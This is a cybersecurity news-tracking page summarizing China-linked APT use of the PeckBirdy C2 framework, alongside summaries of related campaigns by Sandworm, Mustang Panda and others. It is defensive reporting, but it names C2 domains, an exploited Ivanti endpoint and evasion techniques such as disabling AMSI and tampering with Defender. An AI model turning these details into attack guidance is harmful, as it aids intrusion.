CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

China-Linked APTs Deploy PeckBirdy JScript C2 Framework Since 2023

First reported
Last updated
3 unique sources, 3 articles

Summary

Hide ▲

China-aligned APT actors have been using the PeckBirdy JScript-based command-and-control (C2) framework since 2023 to target Chinese gambling industries, Asian government entities, and private organizations. The framework leverages living-off-the-land binaries (LOLBins) for execution across various environments. Two campaigns, SHADOW-VOID-044 and SHADOW-EARTH-045, have been identified, each employing different tactics, including credential harvesting and malware delivery. The framework's flexibility allows it to operate across web browsers, MSHTA, WScript, Classic ASP, Node JS, and .NET, using multiple communication methods like WebSocket and Adobe Flash ActiveX objects. Additional scripts for exploitation, social engineering, and backdoor delivery have been observed, along with links to known backdoors like HOLODONUT and MKDOOR. HOLODONUT disables security features such as AMSI before executing payloads in memory, while MKDOOR disguises its network traffic as legitimate Microsoft support or activation pages and attempts to evade Microsoft Defender by altering exclusion settings. Infrastructure overlaps and shared tooling suggest SHADOW-VOID-044 is linked with UNC3569, a China-aligned group previously associated with the GRAYRABBIT backdoor. Some samples used stolen code-signing certificates to legitimize malicious Cobalt Strike payloads, and SHADOW-EARTH-045 showed weaker but notable ties to activity previously attributed to Earth Baxia. The Shadow-Void-044 campaign used stolen code-signing certificates, Cobalt Strike payloads, and exploits, including CVE-2020-16040, to maintain persistent access. The Shadow-Earth-045 campaign targeted a Philippine educational institution in July 2024, using the GrayRabbit backdoor and the HoloDonut backdoor. The threat actor behind the Shadow-Earth campaign developed a .NET executable to launch PeckBirdy with ScriptControl.

Timeline

  1. 27.01.2026 11:01 3 articles · 2d ago

    PeckBirdy Framework Used in Targeted Attacks Since 2023

    China-aligned APT actors have been using the PeckBirdy JScript-based C2 framework since 2023 to target Chinese gambling industries, Asian government entities, and private organizations. The framework leverages LOLBins for execution across various environments. Two campaigns, SHADOW-VOID-044 and SHADOW-EARTH-045, have been identified, each employing different tactics, including credential harvesting and malware delivery. The framework's flexibility allows it to operate across web browsers, MSHTA, WScript, Classic ASP, Node JS, and .NET, using multiple communication methods like WebSocket and Adobe Flash ActiveX objects. Additional scripts for exploitation, social engineering, and backdoor delivery have been observed, along with links to known backdoors like HOLODONUT and MKDOOR. HOLODONUT disables security features such as AMSI before executing payloads in memory, while MKDOOR disguises its network traffic as legitimate Microsoft support or activation pages and attempts to evade Microsoft Defender by altering exclusion settings. Infrastructure overlaps and shared tooling suggest SHADOW-VOID-044 is linked with UNC3569, a China-aligned group previously associated with the GRAYRABBIT backdoor. Some samples used stolen code-signing certificates to legitimize malicious Cobalt Strike payloads, and SHADOW-EARTH-045 showed weaker but notable ties to activity previously attributed to Earth Baxia. The Shadow-Void-044 campaign used stolen code-signing certificates, Cobalt Strike payloads, and exploits, including CVE-2020-16040, to maintain persistent access. The Shadow-Earth-045 campaign targeted a Philippine educational institution in July 2024, using the GrayRabbit backdoor and the HoloDonut backdoor. The threat actor behind the Shadow-Earth campaign developed a .NET executable to launch PeckBirdy with ScriptControl.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Chinese State-Sponsored Group Exploits Windows Zero-Day in Espionage Campaign Against European Diplomats

A China-linked hacking group, UNC6384 (Mustang Panda), is exploiting a Windows zero-day vulnerability (CVE-2025-9491) to target European diplomats in Hungary, Belgium, Italy, the Netherlands, and Serbian government agencies. The campaign involves spearphishing emails with malicious LNK files to deploy the PlugX RAT and gain persistence on compromised systems. The attacks have broadened in scope to include diplomatic entities from Italy and the Netherlands. The zero-day vulnerability allows for remote code execution on targeted Windows systems, enabling the group to monitor diplomatic communications and steal sensitive data. Microsoft has not yet released a patch for this vulnerability, which has been heavily exploited by multiple state-sponsored groups and cybercrime gangs since March 2025. Microsoft has silently mitigated the vulnerability by changing LNK files in the November updates to display all characters in the Target field, not just the first 260. ACROS Security has also released an unofficial patch to limit shortcut target strings to 260 characters and warn users about potential dangers.

Open in new tab

Russian Sandworm Group Targets Ukrainian Organizations with Data-Wiping Malware and LotL Tactics

Russian threat actors, specifically the Sandworm group, have targeted Ukrainian organizations and Poland's power sector using living-off-the-land (LotL) tactics and deploying data-wiping malware. The attacks, which began in June 2025, involved minimal malware to reduce detection and included the use of web shells and legitimate tools for reconnaissance and data theft. The threat actors exploited unpatched vulnerabilities to deploy web shells on public-facing servers, gaining initial access. They then used various tactics, including PowerShell commands, scheduled tasks, and legitimate software, to evade detection and perform reconnaissance. The attacks were characterized by the use of legitimate tools and minimal malware, demonstrating the actors' deep knowledge of Windows native tools. In addition to LotL tactics, Sandworm deployed multiple data-wiping malware families in June and September 2025, targeting Ukraine's education, government, and grain sectors. The grain sector, a vital economic sector, was targeted to disrupt Ukraine's war economy. The data-wiping malware used included ZeroLot and Sting, with initial access achieved by UAC-0099, who then transferred access to APT44 for wiper deployment. The activity is confirmed to be of Russian origin, with specific attribution to the Sandworm group. In December 2025, Sandworm targeted Poland's power sector with a new wiper malware called DynoWiper, aiming to disrupt the energy infrastructure. The attack, which occurred on December 29 and 30, 2025, targeted two combined heat and power (CHP) plants and a system managing renewable energy sources. The attack was unsuccessful in causing disruption, and Polish authorities attributed it to Russian services. The attack coincided with the tenth anniversary of Sandworm's 2015 attack on Ukraine's power grid. A new Russia-aligned threat activity cluster, InedibleOchotense, impersonated ESET in phishing attacks targeting Ukrainian entities starting in May 2025. This campaign involved sending spear-phishing emails and Signal text messages containing links to trojanized ESET installers, which delivered the Kalambur backdoor. InedibleOchotense is linked to the Sandworm (APT44) hacking group and has been observed conducting destructive campaigns in Ukraine, including the deployment of wiper malware ZEROLOT and Sting. Another Russia-aligned threat actor, RomCom, launched spear-phishing campaigns in mid-July 2025 exploiting a WinRAR vulnerability (CVE-2025-8088) targeting various sectors in Europe and Canada. RomCom also targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent. The activity has been attributed with medium-to-high confidence to Unit 29155 of Russia's Main Directorate of the General Staff of the Armed Forces of the Russian Federation, also known as GRU. The targeted entity had worked for a city with close ties to Ukraine in the past. The ESET report noted that other Russian-aligned APT groups also maintained their focus on Ukraine and countries with strategic ties to Ukraine, while also expanding their operations to European entities. Gamaredon remained the most active APT group targeting Ukraine, with a noticeable increase in intensity and frequency of its operations during the reported period. Gamaredon selectively deployed one of Turla’s backdoors, indicating a rare instance of cooperation between Russia-aligned APT groups. Gamaredon’s toolset continued to evolve, incorporating new file stealers or tunneling services. The cyber attack on the Polish power grid in December 2025 was attributed with medium confidence to a Russian state-sponsored hacking group known as ELECTRUM. The attack targeted distributed energy resources (DERs) and affected communication and control systems at combined heat and power (CHP) facilities and systems managing renewable energy systems. ELECTRUM and KAMACITE share overlaps with the Sandworm cluster, with KAMACITE focusing on initial access and ELECTRUM conducting operations that bridge IT and OT environments. The attackers gained access to operational technology systems critical to grid operations and disabled key equipment beyond repair at the site. The attack was opportunistic and rushed, with the hackers attempting to inflict as much damage as possible by wiping Windows-based devices and resetting configurations. The majority of the equipment targeted was related to grid safety and stability monitoring. The coordinated attack on Poland's power grid in late December targeted multiple distributed energy resource (DER) sites across the country, including combined heat and power (CHP) facilities and wind and solar dispatch systems. Although the attacker compromised operational technology (OT) systems damaging "key equipment beyond repair," they failed to disrupt power, totaling 1.2 GW or 5% of Poland’s energy supply. Based on public reports, there are at least 12 confirmed affected sites. However, researchers at Dragos, a critical industrial infrastructure (OT) and control systems (ICS) security company say that the number is approximately 30. Dragos attributes the attack with moderate confidence to a Russian threat actor it tracks as Electrum, which, although it overlaps with Sandworm (APT44), the researchers underline that it is a distinct activity cluster. Electrum targeted exposed and vulnerable systems involved in dispatch and grid-facing communication, remote terminal units (RTUs), network edge devices, monitoring and control systems, and Windows-based machines at DER sites. Electrum successfully disabled communications equipment at multiple sites, resulting in a loss of remote monitoring and control, but power generation on the units continued without interruption. Certain OT/ICS devices were disabled, and their configurations were corrupted beyond recovery, while Windows systems at the sites were wiped. Even if the attacks had been successful in cutting the power, the relatively narrow targeting scope wouldn’t have been enough to cause a nationwide blackout in Poland. However, they could have caused significant destabilization of the system frequency. "Such frequency deviations have caused cascading failures in other electrical systems, including the 2025 Iberian grid collapse," the researchers say.

Open in new tab

Exploitation of Ivanti EPMM Vulnerabilities (CVE-2025-4427, CVE-2025-4428) Leads to Malware Deployment

Two malware strains were discovered in an organization's network after attackers exploited two zero-day vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM). The vulnerabilities, CVE-2025-4427 and CVE-2025-4428, allow for authentication bypass and remote code execution, respectively. Attackers used these flaws to gain access to the EPMM server, execute arbitrary code, and maintain persistence. The attack began around May 15, 2025, following the publication of a proof-of-concept exploit. The malware sets include loaders that enable arbitrary code execution and data exfiltration. The vulnerabilities affect Ivanti EPMM development branches 11.12.0.4, 12.3.0.1, 12.4.0.1, and 12.5.0.0 and their earlier releases. A China-nexus espionage group was leveraging the vulnerabilities since at least May 15, 2025. The threat actor targeted the /mifs/rs/api/v2/ endpoint with HTTP GET requests and used the ?format= parameter to send malicious remote commands. The malware sets include distinct loaders with the same name, and malicious listeners that allow injecting and running arbitrary code on the compromised system. The threat actor delivered the malware through separate HTTP GET requests in segmented, Base64-encoded chunks. Organizations are advised to update their EPMM instances, monitor for suspicious activity, and implement access restrictions to prevent unauthorized access to mobile device management systems.

Open in new tab

Chinese Malware Campaigns Exploit SEO and GitHub Pages to Distribute HiddenGh0st, Winos, and kkRAT

Chinese-speaking users are targeted by a malware campaign using SEO poisoning and fake software sites to distribute HiddenGh0st, Winos, and kkRAT. The campaign manipulates search rankings and uses trojanized installers to deliver the malware. The attacks exploit vulnerabilities in popular software and use various techniques to evade detection and maintain persistence. The malware is designed to establish command-and-control communication, monitor user activity, and steal sensitive information. The threat actor Dragon Breath, also known as APT-Q-27 and Golden Eye, uses RONINGLOADER to deliver a modified variant of Gh0st RAT. The campaign employs trojanized NSIS installers masquerading as legitimate software like Google Chrome and Microsoft Teams. The malware targets specific antivirus programs, including Microsoft Defender Antivirus, Kingsoft Internet Security, Tencent PC Manager, and Qihoo 360 Total Security. The malware uses a Bring Your Own Vulnerable Driver (BYOVD) technique to disarm antivirus software. The final malware deployed is a modified version of Gh0st RAT, designed to communicate with a remote server to fetch additional instructions. The campaign was discovered in August 2025 and involves multiple malware families, including HiddenGh0st and Winos, which are variants of Gh0st RAT. The attacks use fake software sites and GitHub Pages to distribute the malware, exploiting the trust associated with legitimate platforms. The malware employs sophisticated techniques to evade detection and maintain persistence, including anti-analysis checks and TypeLib COM hijacking. Two interconnected malware campaigns, Campaign Trio and Campaign Chorus, have employed large-scale brand impersonation to deliver Gh0st RAT to Chinese-speaking users. Additionally, a new sample of the ToneShell backdoor, typically seen in Chinese cyberespionage campaigns, has been delivered through a kernel-mode loader in attacks against government organizations. The backdoor has been attributed to the Mustang Panda group, also known as HoneyMyte or Bronze President, that usually targets government agencies, NGOs, think tanks, and other high-profile organizations worldwide. The new variant of the ToneShell backdoor features changes and stealth enhancements, including a new host identification scheme and network traffic obfuscation with fake TLS headers. The driver file is signed with an old, stolen, or leaked digital certificate from Guangzhou Kingteller Technology Co., Ltd, valid from August 2012 to 2015. The driver registers as a minifilter driver on infected machines, injecting a backdoor trojan into system processes and providing protection for malicious files, user-mode processes, and registry keys. The driver resolves required kernel APIs dynamically at runtime by using a hashing algorithm to match the required API addresses. The driver monitors file-delete and file-rename operations to prevent itself from being removed or renamed. The driver denies attempts to create or open Registry keys that match against a protected list by setting up a RegistryCallback routine and ensuring that it operates at an altitude of 330024 or higher. The driver interferes with the altitude assigned to WdFilter.sys, a Microsoft Defender driver, changing it to zero, thereby preventing it from being loaded into the I/O stack. The driver intercepts process-related operations and denies access if the action targets any process that's on a list of protected process IDs when they are running. The driver removes rootkit protection for those processes once execution completes. The driver drops two user-mode payloads, one of which spawns an "svchost.exe" process and injects a small delay-inducing shellcode. The second payload is the TONESHELL backdoor that's injected into that same "svchost.exe" process. Once launched, the backdoor establishes contact with a C2 server ("avocadomechanism[.]com" or "potherbreference[.]com") over TCP on port 443, using the communication channel to receive commands. The backdoor commands include creating temporary files for incoming data, downloading files, canceling downloads, establishing a remote shell via pipe, receiving operator commands, terminating the shell, uploading files, canceling uploads, and closing the connection. The use of TONESHELL has been attributed to Mustang Panda since at least late 2022. As recently as September 2025, the threat actor was linked to attacks targeting Thai entities with TONESHELL and a USB worm named TONEDISK (aka WispRider) that uses removable devices as a distribution vector for a backdoor referred to as Yokai. The C2 infrastructure used for TONESHELL was erected in September 2024, although there are indications that the campaign itself did not commence until February 2025. The exact initial access pathway used in the attack is not clear, but it's suspected that the attackers abused previously compromised machines to deploy the malicious driver. Memory forensics is key to analyzing the new TONESHELL infections, as the shellcode executes entirely in memory. HoneyMyte's 2025 operations show a noticeable evolution toward using kernel-mode injectors to deploy ToneShell, improving both stealth and resilience. The Chinese espionage threat group Mustang Panda has updated its CoolClient backdoor to a new variant that can steal login data from browsers and monitor the clipboard. CoolClient has been associated with Mustang Panda since 2022, deployed as a secondary backdoor alongside PlugX and LuminousMoth. The updated malware version has been observed in attacks targeting government entities in Myanmar, Mongolia, Malaysia, Russia, and Pakistan and were deployed via legitimate software from Sangfor, a Chinese company specialized in cybersecurity, cloud computing, and IT infrastructure products. CoolClient uses encrypted .DAT files in a multi-stage execution and achieves persistence via Registry modifications, the addition of new Windows services, and scheduled tasks. It also supports UAC bypassing and privilege escalation. CoolClient's core features are integrated in a DLL embedded in a file called main.dat. When launched, it first checks whether the keylogger, clipboard stealer, and HTTP proxy credential sniffer are enabled. New CoolClient capabilities include a clipboard monitoring module, the ability to perform active window title tracking, and HTTP proxy credential sniffing that relies on raw packet inspection and headers extraction. The plugin ecosystem has been expanded with a dedicated remote shell plugin, a service management plugin, and a more capable file management plugin. The service management plugin allows the operators to enumerate, create, start, stop, delete, and modify the startup configuration of Windows services. The file management plugin provides extended file operations, including drive enumeration, file search, ZIP compression, network drive mapping, and file execution. Remote shell functionality is implemented via a separate plugin that spawns a hidden cmd.exe process and redirects its standard input and output through pipes, enabling interactive command execution over the command-and-control (C2) channel. A novelty in CoolClient’s operation is the deployment of infostealers to collect login data from browsers. Kaspersky documented three distinct families targeting Chrome (variant A), Edge (variant B), and a more versatile variant C that targets any Chromium-based browser. Another notable operational shift is that browser data theft and document exfiltration now leverage hardcoded API tokens for legitimate public services like Google Drive or Pixeldrain to evade detection.

Open in new tab

EggStreme Fileless Malware Used in Philippine Military Breach

A Chinese APT group has breached a Philippine military company using a previously undocumented fileless malware framework called EggStreme. The malware framework facilitates persistent, low-profile espionage through memory injection and DLL sideloading. The attack began in early 2024 and includes extensive system reconnaissance, lateral movement, and data theft. The EggStreme framework comprises multiple components: EggStremeFuel, EggStremeLoader, EggStremeReflectiveLoader, and EggStremeAgent. The core component, EggStremeAgent, acts as a backdoor enabling system reconnaissance, lateral movement, and data theft via an injected keylogger. The attack aligns with Chinese APT objectives, targeting the Philippines amid geopolitical tensions in the South China Sea.

Open in new tab